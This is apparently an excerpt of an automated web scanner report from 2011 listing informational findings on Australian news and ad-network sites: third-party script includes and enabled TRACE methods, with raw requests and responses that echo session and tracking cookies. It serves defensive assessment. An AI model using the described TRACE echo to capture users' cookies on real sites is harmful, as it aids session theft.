<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.7/prototype.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.9/scriptaculous.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://c3.springcms.com.au/js/system.externallinks.js"></script>
...[SNIP]...

15.45. http://www.7perth.com.au/view/about/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.7perth.com.au
Path:	/view/about/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.7/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.9/scriptaculous.js
http://c3.springcms.com.au/js/system.externallinks.js
http://www.google-analytics.com/ga.js

Request

GET /view/about/ HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.7perth.com.au/view/seven-news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=ifm3c4tfcqeoamntp6t3t0q3u2; __utma=147121073.539278268.1315422878.1315422878.1315422878.1; __utmb=147121073.2.10.1315422878; __utmc=147121073; __utmz=147121073.1315422878.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Wed, 07 Sep 2011 14:20:25 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 11419

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print" href="/css/spring.print.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.7/prototype.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.9/scriptaculous.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://c3.springcms.com.au/js/system.externallinks.js"></script>
...[SNIP]...

15.46. http://www.7perth.com.au/view/seven-news/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.7perth.com.au
Path:	/view/seven-news/

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/prototype/1.7/prototype.js
http://ajax.googleapis.com/ajax/libs/scriptaculous/1.9/scriptaculous.js
http://c3.springcms.com.au/js/system.externallinks.js
http://www.google-analytics.com/ga.js

Request

GET /view/seven-news/ HTTP/1.1
Host: www.7perth.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Content-Type: text/html; charset=utf-8
Date: Wed, 07 Sep 2011 14:14:17 GMT
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Server: Apache/2.2.16 (Amazon)
X-Powered-By: PHP/5.3.6
Connection: keep-alive
Content-Length: 14276

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta htt
...[SNIP]...
<link rel="stylesheet" type="text/css" media="print" href="/css/spring.print.css" />
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/prototype/1.7/prototype.js"></script>
<script type="text/javascript" src="http://ajax.googleapis.com/ajax/libs/scriptaculous/1.9/scriptaculous.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://www.google-analytics.com/ga.js"></script>
...[SNIP]...

<script type="text/javascript" src="http://c3.springcms.com.au/js/system.externallinks.js"></script>
...[SNIP]...

15.47. http://www.abc.net.au/news/2011-09-07/christmas-island-inquest-reopens/2875554/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.abc.net.au
Path:	/news/2011-09-07/christmas-island-inquest-reopens/2875554/

Issue detail

The response dynamically includes the following script from another domain:

http://s7.addthis.com/js/250/addthis_widget.js

Request

Response

15.48. http://www.facebook.com/connect/connect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/connect/connect.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js

Request

Response

15.49. http://www.facebook.com/plugins/likebox.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.facebook.com
Path:	/plugins/likebox.php

Issue detail

The response dynamically includes the following scripts from other domains:

http://static.ak.fbcdn.net/rsrc.php/v1/y4/r/swbbSSZsgUH.js
http://static.ak.fbcdn.net/rsrc.php/v1/y8/r/Md-C6ZvKSHs.js
http://static.ak.fbcdn.net/rsrc.php/v1/yC/r/vneZ6lOGBMV.js
http://static.ak.fbcdn.net/rsrc.php/v1/yn/r/fXOlnGV2onC.js
http://static.ak.fbcdn.net/rsrc.php/v1/yq/r/346Pl_u5ziA.js

Request

Response

15.50. http://www.news.com.au/breaking-news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.news.com.au
Path:	/breaking-news

Issue detail

The response dynamically includes the following script from another domain:

http://w.news-static.com/latest/v/vcms-facade-fatwire-min.js

Request

Response

15.51. http://www.ntnews.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ntnews.com.au
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://network.news.com.au/js/json.js
http://network.news.com.au/js/tanto.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sops.news.com.au/adkit/js/kit.js

Request

GET / HTTP/1.1
Host: www.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "194c3c1f607a5c0310d6839eebd130f3:1315396420"
Last-Modified: Wed, 07 Sep 2011 11:53:40 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:15:40 GMT
Content-Length: 46981
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</script>

<script type="text/javascript" src="http://network.news.com.au/js/tanto.js"></script>
<script type="text/javascript" src="http://network.news.com.au/js/json.js"></script>
...[SNIP]...

<script src="http://sops.news.com.au/adkit/js/kit.js" type="text/javascript"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

15.52. http://www.ntnews.com.au/article/2011/09/07/258681_ntnews.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ntnews.com.au
Path:	/article/2011/09/07/258681_ntnews.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://network.news.com.au/js/json.js
http://network.news.com.au/js/tanto.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sops.news.com.au/adkit/js/kit.js
http://tweetmeme.com/i/scripts/button.js

Request

GET /article/2011/09/07/258681_ntnews.html HTTP/1.1
Host: www.ntnews.com.au
Proxy-Connection: keep-alive
Referer: http://www.ntnews.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sopsview=1; NetInsightSessionID=1; UnicaNIODID=JML4bfhEwu5-XJ0QlB7; __utma=124295189.1286976136.1315422940.1315422940.1315422940.1; __utmb=124295189.1.10.1315422940; __utmc=124295189; __utmz=124295189.1315422940.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=perth%20news

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "af8f5e7f9af40975f6d15824eaa17321:1315375246"
Last-Modified: Wed, 07 Sep 2011 06:00:46 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 32320
Date: Wed, 07 Sep 2011 14:18:58 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.
...[SNIP]...
</script>

<script type="text/javascript" src="http://network.news.com.au/js/tanto.js"></script>
<script type="text/javascript" src="http://network.news.com.au/js/json.js"></script>
...[SNIP]...

<script src="http://sops.news.com.au/adkit/js/kit.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

15.53. http://www.perthnow.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.perthnow.com.au
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://resources1.news.com.au/cs/js/tanto-min.js
http://resources1.news.com.au/cs/network/js/bespoke/site-perthnow-concat-min.js
http://resources1.news.com.au/cs/network/js/library/base-modules-concat-min.js
http://resources1.news.com.au/cs/network/js/library/network-3rdpartylibs-concat-min.js
http://sops.news.com.au/adkit/js/kit.js
http://w.news-static.com/latest/v/vcms-facade-fatwire-min.js

Request

GET / HTTP/1.1
Host: www.perthnow.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
X-Cache-Lookup: MISS from news.com.au:80
Vary: Accept-Encoding
Cache-Control: max-age=119
Expires: Wed, 07 Sep 2011 14:16:03 GMT
Date: Wed, 07 Sep 2011 14:14:04 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 165880

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-au" lang="en-au">
<hea
...[SNIP]...

                   <script type="text/javascript" src="http://resources1.news.com.au/cs/js/tanto-min.js"></script>
                   <script type="text/javascript" src="http://resources1.news.com.au/cs/network/js/library/network-3rdpartylibs-concat-min.js"></script>
                   <script type="text/javascript" src="http://resources1.news.com.au/cs/network/js/library/base-modules-concat-min.js"></script>
                   <script type="text/javascript" src="http://resources1.news.com.au/cs/network/js/bespoke/site-perthnow-concat-min.js"></script>
...[SNIP]...
<link rel="stylesheet" media="screen" type="text/css" href="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.css" />
                   <script type="text/javascript" src="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.js"></script>
       <script type="text/javascript" src="http://sops.news.com.au/adkit/js/kit.js"></script>
...[SNIP]...

15.54. http://www.perthnow.com.au/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.perthnow.com.au
Path:	/business/business-old/fraud-blackmail-in-latest-oswal-claims/story-e6frg2qu-1226131700884

Issue detail

The response dynamically includes the following scripts from other domains:

http://media.news.com.au/news/2011/07-jul/business-markets/js/business-markets.js
http://media.news.com.au/news/2011/07-jul/business-markets/js/jquery.fn.marketmap.js
http://media.news.com.au/news/2011/07-jul/business-markets/js/jquery.fn.marketmovers.js
http://media.news.com.au/news/2011/07-jul/business-markets/js/jquery.fn.marketstatus.js
http://media.news.com.au/news/2011/07-jul/business-markets/js/ndm.newscomau.marketstatusservice.js
http://resources1.news.com.au/cs/js/tanto-min.js
http://resources1.news.com.au/cs/network/js/bespoke/site-newscomaubusiness-concat-min.js
http://resources1.news.com.au/cs/network/js/library/base-modules-concat-min.js
http://resources1.news.com.au/cs/network/js/library/network-3rdpartylibs-concat-min.js
http://sops.news.com.au/adkit/js/kit.js
http://w.news-static.com/latest/v/vcms-facade-fatwire-min.js

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
X-Cache-Lookup: HIT from news.com.au:80
Vary: Accept-Encoding
Cache-Control: max-age=55
Expires: Wed, 07 Sep 2011 14:22:13 GMT
Date: Wed, 07 Sep 2011 14:21:18 GMT
Content-Length: 79281
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-au" lang="en-au">
<hea
...[SNIP]...
<![endif]-->
               <script type="text/javascript" src="http://resources1.news.com.au/cs/js/tanto-min.js"></script>
               <script type="text/javascript" src="http://resources1.news.com.au/cs/network/js/library/network-3rdpartylibs-concat-min.js"></script>
               <script type="text/javascript" src="http://resources1.news.com.au/cs/network/js/library/base-modules-concat-min.js"></script>
               <script type="text/javascript" src="http://resources1.news.com.au/cs/network/js/bespoke/site-newscomaubusiness-concat-min.js"></script>
...[SNIP]...
<link rel="stylesheet" media="screen" type="text/css" href="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.css" />
               <script type="text/javascript" src="http://w.news-static.com/latest/v/vcms-facade-fatwire-min.js"></script>
               <script type="text/javascript" src="http://media.news.com.au/news/2011/07-jul/business-markets/js/ndm.newscomau.marketstatusservice.js"></script>
               <script type="text/javascript" src="http://media.news.com.au/news/2011/07-jul/business-markets/js/jquery.fn.marketstatus.js"></script>
               <script type="text/javascript" src="http://media.news.com.au/news/2011/07-jul/business-markets/js/jquery.fn.marketmovers.js"></script>
               <script type="text/javascript" src="http://media.news.com.au/news/2011/07-jul/business-markets/js/jquery.fn.marketmap.js"></script>
               <script type="text/javascript" src="http://media.news.com.au/news/2011/07-jul/business-markets/js/business-markets.js"></script>
...[SNIP]...
<link rel="stylesheet" media="screen" type="text/css" href="http://media.news.com.au/news/2011/07-jul/business-markets/css/business-markets.css" />
       <script type="text/javascript" src="http://sops.news.com.au/adkit/js/kit.js"></script>
...[SNIP]...

15.55. http://www.smh.com.au/business previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.smh.com.au
Path:	/business

Issue detail

The response dynamically includes the following scripts from other domains:

http://secure-au.imrworldwide.com/cgi-bin/j?ci=rj0091-bt-homepage&se=1&te=0
http://secure-au.imrworldwide.com/v60.js

Request

Response

15.56. http://www.themercury.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.themercury.com.au
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sops.news.com.au/adkit/js/kit.js

Request

GET / HTTP/1.1
Host: www.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "a26c79c823a1ebd88b9b05a735636c26:1315386302"
Last-Modified: Wed, 07 Sep 2011 09:05:02 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Date: Wed, 07 Sep 2011 14:16:50 GMT
Content-Length: 60975
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title> The Mercury - News
...[SNIP]...

<script src="http://sops.news.com.au/adkit/js/kit.js" type="text/javascript"></script>
...[SNIP]...
</div>

<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

15.57. http://www.themercury.com.au/article/2011/09/07/259671_tasmania-news.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.themercury.com.au
Path:	/article/2011/09/07/259671_tasmania-news.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://pagead2.googlesyndication.com/pagead/show_ads.js
http://sops.news.com.au/adkit/js/kit.js
http://tweetmeme.com/i/scripts/button.js

Request

GET /article/2011/09/07/259671_tasmania-news.html HTTP/1.1
Host: www.themercury.com.au
Proxy-Connection: keep-alive
Referer: http://www.themercury.com.au/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sopsview=1; NetInsightSessionID=1; UnicaNIODID=uaUyCFBgOsN-XJ0QrwN; _chartbeat2=r181cfgalzxshna8.1315422965369

Response

HTTP/1.1 200 OK
Server: Apache
ETag: "884d45d598f5ebf97f93680c36d13667:1315386353"
Last-Modified: Wed, 07 Sep 2011 09:05:53 GMT
Accept-Ranges: bytes
Content-Type: text/html
Vary: Accept-Encoding
Content-Length: 43834
Date: Wed, 07 Sep 2011 14:18:54 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

<title>Carbon tax will pas
...[SNIP]...

<script src="http://sops.news.com.au/adkit/js/kit.js" type="text/javascript"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://tweetmeme.com/i/scripts/button.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...

15.58. http://www.watoday.com.au/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.watoday.com.au
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://secure-au.imrworldwide.com/v60.js

Request

GET / HTTP/1.1
Host: www.watoday.com.au
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=perth+news
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Apache
Accept-Ranges: bytes
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Type: text/html; charset=UTF-8
Date: Wed, 07 Sep 2011 14:14:09 GMT
Content-Length: 387687
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<hea
...[SNIP]...

<script type="text/javascript" src="//secure-au.imrworldwide.com/v60.js"></script>
...[SNIP]...

15.59. http://www.watoday.com.au/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.watoday.com.au
Path:	/wa-news/thousands-of-wa-households-went-cold-and-hungry-abs-20110906-1jvz4.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://connect.facebook.net/en_US/all.js
http://pagead2.googlesyndication.com/pagead/show_ads.js
http://platform.twitter.com/widgets.js
http://secure-au.imrworldwide.com/v60.js

Request

Response

HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
X-Cnection: close
P3P: policyref="http://f2.com.au/w3c/p3p.xml", CP="CAO DSP LAW CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT PRE GOV"
Content-Length: 132525
Content-Type: text/html;charset=UTF-8
Date: Wed, 07 Sep 2011 14:20:33 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2
...[SNIP]...
uses the parameter values assigned above to populate an array of
ad objects. Once that array has been populated, the JavaScript will call the google_ad_request_done function to display
the ads. -->
<script type="text/javascript" src="http://pagead2.googlesyndication.com/pagead/show_ads.js"></script>
...[SNIP]...
</script>

<script src="http://connect.facebook.net/en_US/all.js#xfbml=1"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...

<script type="text/javascript" src="//secure-au.imrworldwide.com/v60.js"></script>
...[SNIP]...

15.60. http://www.weatherchannel.com.au/weather-widget.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.weatherchannel.com.au
Path:	/weather-widget.aspx

Issue detail

The response dynamically includes the following scripts from other domains:

http://ajax.googleapis.com/ajax/libs/jquery/1.4.2/jquery.min.js
http://secure-au.imrworldwide.com/v60.js
https://ajax.googleapis.com/ajax/libs/jqueryui/1.8.9/jquery-ui.min.js

Request

Response

16. TRACE method is enabled previous next
There are 9 instances of this issue:

http://bh.contextweb.com/
http://image2.pubmatic.com/
http://m.xp1.ru4.com/
http://matcher-rbc.bidder7.mookie1.com/
http://optimized-by.rubiconproject.com/
http://pixel.rubiconproject.com/
http://secure-au.imrworldwide.com/
http://tap.rubiconproject.com/
http://www.7perth.com.au/

Issue description

The TRACE method is designed for diagnostic purposes. If enabled, the web server will respond to requests which use the TRACE method by echoing in its response the exact request which was received.

Although this behaviour is apparently harmless in itself, it can sometimes be leveraged to support attacks against other application users. If an attacker can find a way of causing a user to make a TRACE request, and can retrieve the response to that request, then the attacker will be able to capture any sensitive data which is included in the request by the user's browser, for example session cookies or credentials for platform-level authentication. This may exacerbate the impact of other vulnerabilities, such as cross-site scripting.

Issue remediation

The TRACE method should be disabled on the web server.

16.1. http://bh.contextweb.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bh.contextweb.com
Path:	/

Request

TRACE / HTTP/1.0
Host: bh.contextweb.com
Cookie: 4e4616c5330e1b00

Response

HTTP/1.1 200 OK
X-Powered-By: Servlet/3.0
Server: GlassFish v3
Content-Type: message/http
Content-Length: 330
Date: Wed, 07 Sep 2011 14:16:01 GMT
Connection: Keep-Alive

TRACE / HTTP/1.0
host: bh.contextweb.com
cookie: 4e4616c5330e1b00; V=PpAVCxNh2PJr; cwbh1=1931%3B10%2F01%2F2011%3BFT049%0A357%3B10%2F03%2F2011%3BEMON2%0A3196%3B10%2F07%2F2011%3BSMTC1; pb_rtb_ev="1:535461.2925993182975414771.0|535039.NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F.0
...[SNIP]...

16.2. http://image2.pubmatic.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://image2.pubmatic.com
Path:	/

Request

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 446f17d03fb387c7

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:15:53 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: image2.pubmatic.com
Cookie: 446f17d03fb387c7; KRTBCOOKIE_57=476-uid:6422714091563403120; KRTBCOOKIE_22=488-pcv:1|uid:2925993182975414771; KRTBCOOKIE_107=1471-uid:NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; PUBRETARGET=78_1409703834.82_1409705283.571_14100
...[SNIP]...

16.3. http://m.xp1.ru4.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://m.xp1.ru4.com
Path:	/

Request

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: 4146f88613b0f307

Response

HTTP/1.1 200 OK
Server: Sun-Java-System-Web-Server/7.0
Date: Wed, 07 Sep 2011 14:14:14 GMT
P3p: policyref="/w3c/p3p.xml", CP="NON DSP COR PSAa OUR STP UNI"
Content-type: message/http
Connection: close

TRACE / HTTP/1.0
Host: m.xp1.ru4.com
Cookie: 4146f88613b0f307; X1ID=OO-00000000000000000

16.4. http://matcher-rbc.bidder7.mookie1.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://matcher-rbc.bidder7.mookie1.com
Path:	/

Request

TRACE / HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com
Cookie: 9504ce3f546f131a

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:11 GMT
Server: Apache/2.2.3 (Red Hat)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: matcher-rbc.bidder7.mookie1.com
Cookie: 9504ce3f546f131a; %2emookie1%2ecom/%2f/1/o=0/cookie; optouts=cookies; RMOPTOUT=3; id=; mdata=
Connection: Keep-Alive
MIG_IP: 50.23.123.106

16.5. http://optimized-by.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: optimized-by.rubiconproject.com
Cookie: 96acc546df8352

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:09 GMT
Server: RAS/1.3 (Unix)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Cookie: 96acc546df8352; put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1185=2925993182975414771; put_1986=6422714091563403120; put_1523=NPgmRuqc1g
...[SNIP]...

16.6. http://pixel.rubiconproject.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pixel.rubiconproject.com
Path:	/

Request

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
Cookie: 7e741ecc49313397

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:14:17 GMT
Server: Apache/2.2.3 (CentOS)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: pixel.rubiconproject.com
